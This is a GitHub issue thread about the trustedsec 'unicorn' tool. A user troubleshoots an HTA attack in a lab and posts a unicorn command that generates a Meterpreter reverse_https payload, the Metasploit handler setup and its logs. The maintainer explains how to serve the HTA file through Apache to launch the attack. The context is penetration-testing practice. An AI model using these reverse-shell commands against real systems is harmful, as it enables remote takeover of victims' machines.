search

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

HTA Attack Error #37

Closed c0d3xpl0it closed 7 years ago

c0d3xpl0it commented 7 years ago

Team,

I am trying the HTA attack on my lab (Win 10/2012). But when I access https://192.168.1.5 on victim end. I got the below error.

Server End: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set EnableStageEncoding true EnableStageEncoding => true msf exploit(handler) > exploit -j [*] Exploit running as background job.

[] Started HTTPS reverse handler on https://0.0.0.0:443/ [] Starting the payload handler... msf exploit(handler) > [] 192.168.1.100:41859 Request received for /... [] 192.168.1.100:41859 Unknown request to / #<Rex::Proto::Http::Request:0x0000000414c0b8 @headers={"Accept"=> "text/html, application/xhtml+xml, image/jxr, /", "Host"=>"192.168.1.5", "Connection"=>"Keep-Alive", "Acce pt-Language"=>"en-IN", "User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik e Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586", "Accept-Encoding"=>"gzip, deflate"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GET", @rawuri="/", @uri parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_m ode="hex-normal", @relative_resource="/", @body_bytes_left=0>... [] 192.168.1.100:41877 Request received for /... [] 192.168.1.100:41877 Unknown request to / #<Rex::Proto::Http::Request:0x0000000406e0b0 @headers={"Host"=>" 192.168.1.5", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language"= >"en-us", "Connection"=>"keep-alive", "Accept-Encoding"=>"gzip, deflate", "User-Agent"=>"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/6 02.1"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GE T", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max _size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...

trustedsec commented 7 years ago

You are attempting to browse to port 443 where your payload is listening. You need to go into the hta attack folder, copy the index.html and the hta file to Apache which is located under /var/www/html and type services apache2 start. Once Apache is started, using the browser to browser via HTTP (not HTTPS) to the website to launch the HTA.